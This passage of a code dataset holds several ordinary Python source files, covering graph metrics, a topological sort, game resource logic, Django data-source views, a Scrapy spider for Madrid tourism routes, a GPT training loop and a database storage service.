{organisatie_eenheid.lower()}',\n f'Samenwerkingen tussen {organisatie_eenheid_meervoud}',\n f'Aantal stafleden binnen {organisatie_eenheid.lower()}',\n f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen']\n result = pd.DataFrame(index=unique_affiliations,\n columns=all_metrics,\n data=np.zeros((len(unique_affiliations), len(all_metrics))))\n\n if verbose:\n print(result)\n\n for affiliation in 
unique_affiliations:\n\n # all nodes with that affiliation\n aff_nodes = [node for node, aff in G.nodes(data=organisatie_eenheid) if aff == affiliation]\n\n result.loc[affiliation, f'Aantal stafleden binnen {organisatie_eenheid.lower()}'] = len(aff_nodes)\n # result[affiliation] = {f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}': 0,\n # f'Samenwerkingen binnen {organisatie_eenheid.lower()}': 0,\n # f'Samenwerkingen tussen {organisatie_eenheid_meervoud}': 0,\n # f'Aantal stafleden binnen {organisatie_eenheid.lower()}': len(aff_nodes)}\n\n for node in aff_nodes:\n\n # bereken de som van alle interne samenwerkingen (weights van inner edges)\n # voor deze node en deel door 2 omdat anders de inner nodes van een organisatie_eenheid/affiliation\n # dubbel geteld worden\n weights_inner_edges = [d['weight'] for u, v, d in G.edges(node, data=True) if d['is_inner'] == 1]\n aff_inner_sum = sum(weights_inner_edges) / 2 # /2 omdat we anders de inner edges dubbel tellen\n result.loc[affiliation, f'Samenwerkingen binnen {organisatie_eenheid.lower()}'] += aff_inner_sum\n\n # som van alle samenwerkingen across organisatie_eenheid\n weights_outer_edges = [d['weight'] for u, v, d in G.edges(node, data=True) if d['is_outer'] == 1]\n aff_outer_sum = sum(weights_outer_edges)\n result.loc[affiliation, f'Samenwerkingen tussen {organisatie_eenheid_meervoud}'] += aff_outer_sum\n\n # totale samenwerkingen\n result.loc[affiliation, f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}'] += aff_inner_sum + aff_outer_sum \n\n if verbose:\n print(node)\n print('edges van node: ', G.edges(node, data=True))\n print()\n print('weights van inner edges (dus alle interne samenwerkingen van deze persoon', weights_inner_edges)\n print()\n print(result)\n print()\n print()\n try:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = round(100 * result.loc[affiliation, f'Samenwerkingen tussen {organisatie_eenheid_meervoud}'] / result.loc[affiliation, f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}']) \n except ZeroDivisionError:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = 0\n except ValueError:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = np.nan\n\n \n result[f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = [f'{d}%' if not math.isnan(d) else 'n.v.t.' 
for d in result[f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'].values] \n\n \n result = result.style.format(\"{:.0f}\", subset=all_metrics[:-1])\n\n return result","repo_name":"NHameleers/heidag_netwerken","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459760731","text":"# Topological Sort\n\nclass Graph:\n def __init__(self, gdict = None):\n if not gdict:\n self.dict = dict()\n else:\n self.dict = gdict\n\n def addEdge(self, node1, node2):\n if not node1 in self.dict.keys():\n self.dict[node1] = list()\n\n if not node2 in self.dict[node1]:\n self.dict[node1].append(node2)\n\n\n \n def topologicalSortUtil(self, v, visited, stack):\n visited.append(v)\n\n if not v in self.dict.keys():\n self.dict[v] = list()\n\n for i in self.dict[v]:\n if i not in visited:\n self.topologicalSortUtil(i, visited, stack)\n\n stack.insert(0, v)\n\n\n def topologicalSort(self):\n visited = list()\n stack = list()\n for k in list(self.dict):\n if not k in visited:\n self.topologicalSortUtil(k, visited, stack)\n print(stack)\n\n\n\ngraph = Graph()\ngraph.addEdge(\"A\", \"C\")\ngraph.addEdge(\"C\", \"E\")\ngraph.addEdge(\"E\", \"H\")\ngraph.addEdge(\"E\", \"F\")\ngraph.addEdge(\"F\", \"G\")\ngraph.addEdge(\"B\", \"D\")\ngraph.addEdge(\"B\", \"C\")\ngraph.addEdge(\"D\", \"F\")\n\ngraph.topologicalSort()\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"11-Graph/TopologicalSort.py","file_name":"TopologicalSort.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28063633517","text":"import Map\nimport StatParser\nwoodList = []\nwoodLeft = []\nmineralList = []\nmineralLeft = []\n\n# Puts all trees and ores into lists for later\ndef findMaterials():\n global woodList\n global mineralList\n for x in range(len(Map.map)):\n for y in range(len(Map.map[x])):\n if Map.map[x][y] == \"T\":\n woodList.append([x, y])\n woodLeft.append([x, y, 0])\n if Map.map[x][y] == \"I\":\n mineralList.append((x, y))\n mineralLeft.append((x, y))\n\n# Checks if wood can be collected\ndef gatherWood(agent):\n for i in range(len(woodList)):\n # If agent is standing on wood\n if agent.getPos() == (woodList[i][0], woodList[i][1]):\n treeGone = True\n # If wood has no charges left, change texture and remove from list\n for j in range(len(woodLeft)):\n if woodList[i] == [woodLeft[j][0], woodLeft[j][1]]:\n treeGone = False\n break\n if treeGone:\n Map.changeMap(\"t\", (woodList[i][0], woodList[i][1]))\n return True\n return False\n\n# Tells lists that a tree has been found and will be cut down\ndef treeFound(pos):\n for i in range(len(woodLeft)):\n if pos == (woodLeft[i][0], woodLeft[i][1]):\n woodLeft[i][2] += 1\n if woodLeft[i][2] >= StatParser.statDict[\"treeLife\"]:\n woodLeft.pop(i)\n break\n\n# Checks if ores can be collected\ndef gatherMinerals(agent):\n # If the world is out of ores, become woodcutter\n if not mineralLeft:\n agent.setJob(\"woodCutter\")\n return False\n # When agent stands on ore and is planning to pick it up, remove it from list and change texture\n for i in range(len(mineralList)):\n if agent.getPos() == (mineralList[i][0], mineralList[i][1]):\n if not agent.getPath():\n Map.changeMap(\"M\", (mineralList[i][0], mineralList[i][1]))\n mineralList.remove((mineralList[i][0], 
mineralList[i][1]))\n agent.setInventory(\"minerals\")\n return True\n return False\n\n# Tells lists that an ore has been found and will be collected\ndef mineralFound(pos):\n for i in range(len(mineralLeft)):\n if pos == mineralLeft[i]:\n mineralLeft.pop(i)\n break\n\n","repo_name":"oscstr-9/Datorspels-AI---S0006D","sub_path":"Lab3/Resources.Py","file_name":"Resources.Py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7273920096","text":"import json\nimport mimetypes\nimport os\nimport uuid\nfrom wsgiref.util import FileWrapper\n\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import views, response\nfrom rest_framework import permissions\nfrom rest_framework.parsers import FileUploadParser\nfrom rest_framework.response import Response\n\nimport data_scout\n\nfrom ..views.iam import ProjectModelView\nfrom ..serializers import DataSourceSerializer, UserFileSerializer, DataSourceFolderSerializer, JoinSerializer\nfrom ..models import DataSource, UserFile, DataSourceFolder, Join\n\n\ndef _is_int(val):\n try:\n int(val)\n return True\n except (TypeError, ValueError):\n return False\n\n\nclass DataSourceViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows data sources to be viewed or edited.\n \"\"\"\n queryset = DataSource.objects.all()\n serializer_class = DataSourceSerializer\n\n def _make_schema(self, request):\n \"\"\"\n Generate a schema for this data source (column names and types).\n\n :param request:\n :return:\n \"\"\"\n # We check whether the data source actually works and what the data schema looks like\n definition = {\"use_sample\": True,\n \"sampling_technique\": \"top\",\n \"column_types\": True}\n data_source = {\"source\": request.data[\"source\"], \"kwargs\": json.loads(request.data[\"kwargs\"])}\n\n scout = data_scout.scout.Scout()\n ds = scout.get_data_source(data_source[\"source\"])\n # Sometimes a data source is created that isn't ready to be tested (e.g. because the files still need to be\n # uploaded).\n ready = True\n for field_name, field in ds.fields.items():\n if field[\"type\"] == \"file\":\n if field_name in data_source[\"kwargs\"] and _is_int(data_source[\"kwargs\"][field_name]):\n user_file = UserFile.objects.get(pk=data_source[\"kwargs\"][field_name])\n data_source[\"kwargs\"][field_name] = os.path.join(settings.MEDIA_ROOT, user_file.file_name)\n else:\n ready = False\n if ready:\n definition[\"data_source\"] = data_source\n definition[\"pipeline\"] = []\n records, columns = scout.execute_json(definition, data_scout.executor.PandasExecutor)\n request.data[\"schema\"] = json.dumps(columns[-1])\n return request\n\n def update(self, request, *args, **kwargs):\n request = self._make_schema(request)\n return super().update(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n request = self._make_schema(request)\n return super().create(request, *args, **kwargs)\n\n\nclass UserFileViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows user files to be viewed or edited.\n \"\"\"\n queryset = UserFile.objects.all()\n serializer_class = UserFileSerializer\n\n def get(self, user_file: int):\n return JsonResponse({\"user_file\": user_file})\n\n def retrieve(self, request, pk=None, **kwargs):\n \"\"\"\n Retrieve the user file. 
If the \"output\" get parameter is set to file, it will return a raw file. If it's set to\n JSON (which is the default), it will return the userfile object as JSON.\n \"\"\"\n user_file = get_object_or_404(self.queryset, pk=pk)\n if request.query_params.get(\"output\", \"json\") == \"file\":\n with default_storage.open(user_file.file_name) as f:\n res = HttpResponse(FileWrapper(f), content_type=mimetypes.guess_type(user_file.original_file_name))\n res['Content-Disposition'] = f\"attachment; filename={user_file.original_file_name}\"\n return res\n else:\n serializer = self.serializer_class(user_file)\n return Response(serializer.data)\n # TODO: Add some sort of on delete to delete the accompanying file\n\n def get_queryset(self):\n queryset = self.queryset.filter(project=self.request.user.profile.project.project)\n return queryset\n\n\nclass UserFileUploadView(views.APIView):\n \"\"\"\n This view allows the user to upload files.\n \"\"\"\n parser_classes = [FileUploadParser]\n queryset = UserFile.objects.all()\n permission_classes = [permissions.IsAuthenticated]\n\n def put(self, request, user_file_id: int, format=None):\n \"\"\"\n Upload a file to the default storage location and attach it to the userfile object that was created earlier.\n\n :param request:\n :param user_file_id: The user file object id to attach this file to.\n :param format:\n :return:\n \"\"\"\n file_name = str(uuid.uuid4())\n user_file = get_object_or_404(UserFile, pk=user_file_id)\n\n # If there's already a file, we'll delete it\n if user_file.file_name is not None and default_storage.exists(user_file.file_name):\n default_storage.delete(user_file.file_name)\n\n file_obj = request.data['file']\n default_storage.save(file_name, ContentFile(file_obj.read()))\n user_file.file_name = file_name\n user_file.original_file_name = request.data['file'].name\n user_file.save()\n\n serializer = UserFileSerializer(user_file, many=False)\n return Response(serializer.data)\n\n\nclass DataSourceTypesView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request):\n \"\"\"\n Get an overview of all available data source types.\n \"\"\"\n scout = data_scout.scout.Scout()\n data_source_types = scout.data_sources\n serialized = []\n for data_source_type in data_source_types.values():\n serialized.append({\"name\": data_source_type.__name__, \"fields\": data_source_type.fields})\n\n return response.Response(serialized)\n\n\nclass DataSourceFolderViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows data source folders to be viewed or edited.\n \"\"\"\n queryset = DataSourceFolder.objects.all()\n serializer_class = DataSourceFolderSerializer\n\n\nclass JoinViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows joins to be viewed or edited.\n \"\"\"\n queryset = Join.objects.all()\n serializer_class = JoinSerializer\n\n\ndef _data_source_to_dict(data_source: DataSource, scout: data_scout.scout.Scout):\n \"\"\"\n Convert a data source object to a dictionary.\n\n :param data_source: The data source to convert\n :param scout: An initialized data scout Scout object\n :return:\n \"\"\"\n data_source = {\"source\": data_source.source, \"kwargs\": json.loads(data_source.kwargs)}\n ds = scout.get_data_source(data_source[\"source\"])\n for field_name, field in ds.fields.items():\n if field[\"type\"] == \"file\":\n user_file = UserFile.objects.get(pk=data_source[\"kwargs\"][field_name])\n data_source[\"kwargs\"][field_name] = os.path.join(settings.MEDIA_ROOT, user_file.file_name)\n return 
data_source\n\n\ndef _data_source_to_pipeline(data_source: DataSource, scout: data_scout.scout.Scout, use_sample=True, column_types=True,\n sampling_technique: str = 'top'):\n \"\"\"\n Convert a data source to a pipeline element.\n\n :param data_source: The data source to convert\n :param scout: An initialized data scout Scout object\n :param use_sample: If True sample the dataset, if False use all data.\n :param column_types: If True return the column types as well (more overhead), if False then don't include them\n :param sampling_technique: The sampling technique to use\n :return:\n \"\"\"\n # data_source = get_object_or_404(DataSource, pk=data_source)\n return {\n \"use_sample\": use_sample,\n \"sampling_technique\": sampling_technique,\n \"column_types\": column_types,\n \"data_source\": _data_source_to_dict(data_source, scout),\n \"pipeline\": []\n }\n\n\n\n","repo_name":"janthiemen/data_scout_server","sub_path":"backend/apps/scout/views/datasources.py","file_name":"datasources.py","file_ext":"py","file_size_in_byte":8004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43067129931","text":"import scrapy\nimport re\nfrom scrapy import Request\nfrom prueba.items import ItinerarioItem\n\n\nclass MadridRoutesSpider(scrapy.Spider):\n name = \"madrid_routes\"\n\n BASE_URL = \"https://turismomadrid.es\"\n ROUTES_URL = BASE_URL + \"/es/rutas.html\"\n ALL_DB = False\n\n custom_settings = {\n \"ITEM_PIPELINES\": {\"prueba.pipelines.ElasticsearchPipeline\": 300},\n \"CONCURRENT_REQUESTS\": 8,\n }\n\n def start_requests(self):\n req = Request(\n url=self.ROUTES_URL,\n callback=self.parse_etapas,\n )\n yield req\n\n def parse_etapas(self, response):\n etapas = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"rutas\")]/@href'\n ).getall()\n\n if self.ALL_DB:\n for etapa in etapas:\n req = Request(\n url=self.BASE_URL + etapa,\n callback=self.parse_etapa,\n )\n yield req\n else:\n req = Request(\n url=self.BASE_URL + etapas[0],\n callback=self.parse_etapa,\n )\n yield req\n\n def parse_etapa(self, response):\n main_etapa_title = response.xpath('//h1[@class=\"titulo-etapa\"]/text()').get()\n main_etapa_description = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).get()\n main_etapa_image = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/../div/img/@src'\n ).get()\n main_etapa_distance = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"KM\")]/text()'\n ).get()\n main_etapa_total_routes = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"etapa\")]/text()'\n ).get()\n main_etapa_duration = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"h\")]/text()'\n ).get()\n gpx_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"GPX\")]/@href'\n ).get()\n )\n kmz_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"KMZ\")]/@href'\n ).get()\n )\n\n main_etapa_details = {\n \"main_etapa_title\": main_etapa_title,\n \"main_etapa_description\": main_etapa_description,\n \"main_etapa_image\": main_etapa_image,\n \"main_etapa_distance\": main_etapa_distance,\n \"main_etapa_total_routes\": main_etapa_total_routes,\n \"main_etapa_duration\": main_etapa_duration,\n \"gpx_link\": gpx_link,\n \"kmz_link\": kmz_link,\n }\n mainEtapa = {\n \"id\": 
main_etapa_title,\n \"object\": \"main_etapa\",\n \"details\": main_etapa_details,\n }\n yield ItinerarioItem(mainEtapa)\n\n rutas = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"rutas\")]/@href'\n ).getall()\n\n if self.ALL_DB:\n for route in rutas:\n req = Request(\n url=self.BASE_URL + route,\n callback=self.parse_routes,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n yield req\n else:\n req = Request(\n url=self.BASE_URL + rutas[0],\n callback=self.parse_routes,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n yield req\n\n def parse_routes(self, response):\n main_etapa_details = response.meta[\"_main_etapa_details\"]\n main_etapa_title = main_etapa_details[\"main_etapa_title\"]\n\n route_number = response.xpath('//h3[@class=\"etapa-titulo\"]/text()').get()\n route_name = response.xpath('//h1[@class=\"nivel2-titulo\"]/text()').get()\n route_description_all = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).getall()\n route_description = \" \".join(route_description_all)\n gpx_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"GPX\")]/@href'\n ).get()\n )\n kmz_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"KMZ\")]/@href'\n ).get()\n )\n\n route_details = {\n \"route_number\": route_number,\n \"route_name\": route_name,\n \"route_description\": route_description,\n \"gpx_link\": gpx_link,\n \"kmz_link\": kmz_link,\n }\n\n routeDetails = {\n \"id\": main_etapa_title + \"_\" + route_number,\n \"object\": \"route_details\",\n \"details\": route_details,\n }\n yield ItinerarioItem(routeDetails)\n\n itinerarios = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"etapa\")]/@href'\n ).getall()\n if self.ALL_DB:\n for route in itinerarios:\n req = Request(\n url=self.BASE_URL + route,\n callback=self.parse_itinerarios,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n req.meta[\"_route_details\"] = route_details\n yield req\n else:\n req = Request(\n url=self.BASE_URL + itinerarios[0],\n callback=self.parse_itinerarios,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n req.meta[\"_route_details\"] = route_details\n yield req\n\n def parse_itinerarios(self, response):\n main_etapa_details = response.meta[\"_main_etapa_details\"]\n route_details = response.meta[\"_route_details\"]\n\n main_etapa_title = main_etapa_details[\"main_etapa_title\"]\n route_number = route_details[\"route_number\"]\n\n itinerary_title = response.xpath('//h1[@class=\"nivel2-titulo\"]/text()').get()\n itinerary_distance = response.xpath(\n '//div[contains(@class, \"distancia-ruta\")]//span/text()'\n ).get()\n itinerary_details = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).getall()\n itinerary_description = itinerary_details[0]\n itinerary_path = itinerary_details[1]\n\n step_by_step = response.xpath(\n '//div[contains(@class,\"large-bottom\")]/div/div/../../div'\n )\n\n stepsList = []\n for step in step_by_step:\n step_name = step.xpath('.//div[@id=\"texto\"]//text()').get()\n step_description = step.xpath(\n './/div[contains(@class,\"descripcion-etapa\")]/p[1]/text()'\n ).get()\n image_long = step.xpath(\n './/div[contains(@style,\"background-image\")]/@style'\n ).get()\n if image_long is not None:\n image_link = re.search(\"(?Phttps?://[^\\s]+)\", image_long).group(\n \"url\"\n )\n else:\n image_link = \"\"\n stepObject = {\n \"step_name\": 
step_name,\n \"step_description\": step_description,\n \"image_link\": image_link,\n }\n stepsList.append(stepObject)\n\n itinerario_info = {\n \"itinerary_title\": itinerary_title,\n \"itinerary_distance\": itinerary_distance,\n \"itinerary_description\": itinerary_description,\n \"itinerary_path\": itinerary_path,\n \"step_by_step\": stepsList,\n }\n\n itinerarioDetails = {\n \"id\": main_etapa_title + \"_\" + route_number + \"_\" + itinerary_title,\n \"object\": \"itinerario_details\",\n \"details\": itinerario_info,\n }\n yield ItinerarioItem(itinerarioDetails)\n","repo_name":"fjmaco/madridRoutesScraping","sub_path":"prueba/prueba/spiders/turismomadrid.py","file_name":"turismomadrid.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12125813855","text":"\nopcao = int(input(\"Digite a quantidade de números que quer saber da série de Fibonacci: \"))\nanterior = 0\nproximo = 0\n\nwhile(opcao > 0):\n print(proximo)\n opcao = opcao -1\n\n proximo = proximo + anterior\n anterior = proximo - anterior\n if(proximo == 0):\n proximo = proximo + 1 ","repo_name":"TheMarcelin/Python","sub_path":"Q6.1.py","file_name":"Q6.1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557142768","text":"import json\nimport logging\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom typing import Dict, List\nimport csv\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom accelerate import Accelerator\nimport transformers\nfrom transformers import (\n PreTrainedModel,\n AutoConfig,\n AutoModelForTokenClassification,\n AutoTokenizer,\n get_scheduler,\n)\n\nfrom dataset import SeqTaggingClsDataset\nfrom utils import same_seed\n\n@torch.no_grad()\ndef predict(model:PreTrainedModel,\n dataloader: DataLoader,\n idx2tag\n ):\n model.eval()\n test_ids: List[str] = []\n all_preds: List[List[int]] = []\n test_pbar = tqdm(dataloader, position=0, leave=True) \n\n for _, batch in enumerate(test_pbar):\n ids = batch.pop('ids')\n labels = batch.pop('labels')\n outputs = model(**batch)\n # preds size -> (Batch, Seq_len)\n preds = outputs.logits.argmax(dim=-1)\n # Remove ignored index (special tokens)\n true_predictions = [\n ' '.join([idx2tag[int(p)] for (p, l) in zip(prediction, label) if l != -100])\n for prediction, label in zip(preds, labels)\n ]\n test_ids.extend(ids)\n all_preds.extend(true_predictions)\n\n return all_preds, test_ids\n\ndef main(args):\n # TODO: implement main function\n same_seed(12345)\n\n # Initialize the accelerator. 
We will let the accelerator handle device placement for us in this example.\n global accelerator\n accelerator = Accelerator()\n\n tag_idx_path = args.cache_dir / \"tag2idx.json\"\n tag2idx: Dict[str, int] = json.loads(tag_idx_path.read_text())\n idx2tag = {v: k for k, v in tag2idx.items()}\n\n config = AutoConfig.from_pretrained(args.model_dir, id2label=idx2tag)\n tokenizer = AutoTokenizer.from_pretrained(args.model_dir, do_lower_case=True)\n model = AutoModelForTokenClassification.from_pretrained(args.model_dir, config=config)\n\n data = json.loads(args.test_path.read_text())\n dataset = SeqTaggingClsDataset(data, tokenizer, tag2idx, args.max_len, False)\n # TODO: create DataLoader for test dataset\n dataloader = DataLoader(dataset=dataset,\n batch_size=args.batch_size,\n pin_memory=False,\n shuffle=False,\n collate_fn=dataset.collate_fn\n )\n # Prepare everything with our accelerator.\n model, test_dataloader = accelerator.prepare(\n model, dataloader\n )\n logging.info(\"\\n******** Running prediction ********\")\n logging.info(f\"Num test examples = {len(dataset)}\")\n # TODO: predict dataset\n true_predictions, test_ids = predict(model, test_dataloader, idx2tag)\n\n # TODO: write prediction to file (args.pred_file)\n with open(args.pred_file , 'w', encoding='utf-8', newline='') as file:\n csvWriter = csv.writer(file)\n csvWriter.writerow(['id', 'tags'])\n for test_id, pred in zip(test_ids, true_predictions):\n csvWriter.writerow([test_id, pred])\n\ndef parse_args() -> Namespace:\n parser = ArgumentParser()\n parser.add_argument(\n \"--test_path\",\n type=Path,\n help=\"Path to the test file.\",\n default=\"./data/slot/test.json\"\n )\n parser.add_argument(\n \"--cache_dir\",\n type=Path,\n help=\"Directory to the preprocessed caches.\",\n default=\"./cache/slot/\",\n )\n parser.add_argument(\n \"--ckpt_path\",\n type=Path,\n help=\"Path to model checkpoint.\",\n default=\"./ckpt/slot/\",\n required=False\n )\n parser.add_argument(\"--pred_file\", type=Path, default=\"slot.csv\")\n\n # data\n parser.add_argument(\"--max_len\", type=int, default=32)\n\n\n # data loader\n parser.add_argument(\"--batch_size\", type=int, default=4)\n\n parser.add_argument(\n \"--device\", type=torch.device, help=\"cpu, cuda, cuda:0, cuda:1\", default=\"cuda:0\"\n )\n # which model\n parser.add_argument(\"--model_dir\", type=str, default=\"bert-base-uncased\")\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n\n# python ./test_slot.py --test_file ./data/slot/test.json --ckpt_path ckpt/slot/best_slot.pt --pred_file ./pred/slot --hidden_size 512 --init_weights normal --model_name gru\n# bash ./slot_tag.sh ./data/slot/test.json ./pred/slot ","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW1_BERT/test_slot.py","file_name":"test_slot.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32535301216","text":"import contextlib\nimport math\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom dataset import TokenDataset\nfrom model import GPT\n\n\nclass CosineAnealingLR:\n def __init__(self, optim: torch.optim.Optimizer, lr: float, n_iters: int, n_warmup: int = 0) -> None:\n self.optim = optim\n self.lr = lr\n self.n_iters = n_iters\n self.n_warmup = n_warmup\n\n def set_lr(self, iter: int) -> float:\n if iter < self.n_warmup:\n lr = 0.1 * self.lr + 0.9 * self.lr * iter / self.n_warmup\n else:\n ratio = min((iter - 
self.n_warmup) / (self.n_iters - self.n_warmup), 1)\n lr = 0.01 * self.lr + 0.5 * 0.99 * self.lr * (1 + math.cos(ratio * math.pi))\n\n for grp in self.optim.param_groups:\n grp[\"lr\"] = lr\n return lr\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nfp16 = device == \"cuda\"\ngrad_accumulation = 2\nbatch_size = 64\nlr = 3e-3\nwd = 1e-1\n\n# Chinchilla: https://arxiv.org/abs/2203.15556\nvocab_size = 8000\ncontext_length = 1024\nd_model = 512\nn_heads = 8\nn_layers = 8\n\nn_iters = 100_000\nn_warmup = 1000\n\nmodel = GPT(vocab_size, context_length, d_model, n_heads, n_layers).to(device)\nmodel: GPT = torch.compile(model)\ntrain_ds = TokenDataset(\"tiny_stories_train.bin\", context_length, device=device)\nvalid_ds = TokenDataset(\"tiny_stories_valid.bin\", context_length, 1, device)\n\noptim = model.configure_optimizer(lr, wd, (0.9, 0.95))\nlr_scheduler = CosineAnealingLR(optim, lr, n_iters, n_warmup)\nfp16_ctx = torch.autocast(device, torch.float16) if fp16 else contextlib.nullcontext()\nscaler = torch.cuda.amp.grad_scaler.GradScaler(enabled=fp16)\n\nn_tokens_per_iter = context_length * batch_size * grad_accumulation\nprint(f\"No. of tokens per iteration: {n_tokens_per_iter:,}\")\n\ntrain_batches = iter(DataLoader(train_ds, batch_size))\ninputs, targets = next(train_batches)\n\niter_idx = 0\ntime0 = time.time()\nlog_interval = 10\nwhile True:\n _lr = lr_scheduler.set_lr(iter_idx)\n for i in range(grad_accumulation):\n with fp16_ctx:\n loss = model(inputs, targets) / grad_accumulation\n inputs, targets = next(train_batches)\n scaler.scale(loss).backward()\n\n scaler.step(optim)\n scaler.update()\n optim.zero_grad(True)\n\n if iter_idx % log_interval == 0:\n time1 = time.time()\n speed = log_interval / (time1 - time0)\n time0 = time1\n print(f\"Iter {iter_idx} - lr {_lr:.3e} | {speed:.2f} it/s | loss {loss.item() * grad_accumulation:.3e}\")\n\n iter_idx += 1\n if iter_idx > n_iters:\n break\n\ntorch.save(model.state_dict(), \"model.pth\")\n","repo_name":"gau-nernst/gpt","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26547735062","text":"import connexion\nfrom connexion import NoContent\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import and_\nfrom base import Base\nfrom meal_calories import MealCalories\nfrom user_weight import UserWeight\nimport datetime\n# import mysql-connector-python\nimport pymysql\nimport yaml\nimport logging\nimport logging.config\nimport time\n\nimport json\nfrom pykafka import KafkaClient\nfrom pykafka.common import OffsetType\nfrom threading import Thread\nimport os\n\nif \"TARGET_ENV\" in os.environ and os.environ[\"TARGET_ENV\"] == \"test\":\n print(\"In Test Environment\")\n app_conf_file = \"/config/app_conf.yml\"\n log_conf_file = \"/config/log_conf.yml\"\nelse:\n print(\"In Dev Environment\")\n app_conf_file = \"app_conf.yml\"\n log_conf_file = \"log_conf.yml\"\n\nwith open(app_conf_file, \"r\") as f:\n app_config = yaml.safe_load(f.read())\n\nwith open(log_conf_file, 'r') as f:\n log_config = yaml.safe_load(f.read())\n logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info(\"App Conf File: %s\" % app_conf_file)\nlogger.info(\"Log Conf File: %s\" % log_conf_file)\n\nuser = app_config['datastore']['user']\npassword = app_config['datastore']['password']\nhostname = 
app_config['datastore']['hostname']\nport = app_config['datastore']['port']\ndb = app_config['datastore']['db']\n\nDB_ENGINE = create_engine(f'mysql+pymysql://{user}:{password}@{hostname}:{port}/{db}')\nBase.metadata.bind = DB_ENGINE\nDB_SESSION = sessionmaker(bind=DB_ENGINE)\n\nlogger.info(f\"Connecting to DB. Hostname: {hostname}, Port: {port}\")\n\n# Your functions here\n# def meal_calories(body):\n# session = DB_SESSION()\n\n# mc = MealCalories(body['user_id'],\n# body['calorie_count'],\n# body['meal_name'],\n# body['meal_number'],\n# body['timestamp'],\n# body['trace_id'])\n\n# session.add(mc)\n# session.commit()\n# session.close()\n\n# logger.debug(f'Stored event meal_calories request with a trace_id of {body[\"trace_id\"]}')\n\n# return NoContent, 201\n\n# def user_weight(body):\n# session = DB_SESSION()\n\n# uw = UserWeight(body['user_id'],\n# body['weight_kg'],\n# body['weight_lbs'],\n# body['timestamp'],\n# body['trace_id'])\n\n# session.add(uw)\n# session.commit()\n# session.close()\n\n# logger.debug(f'Stored event user_weight request with a trace_id of {body[\"trace_id\"]}')\n\n# return NoContent, 201\n\ndef get_meal_calories(timestamp, 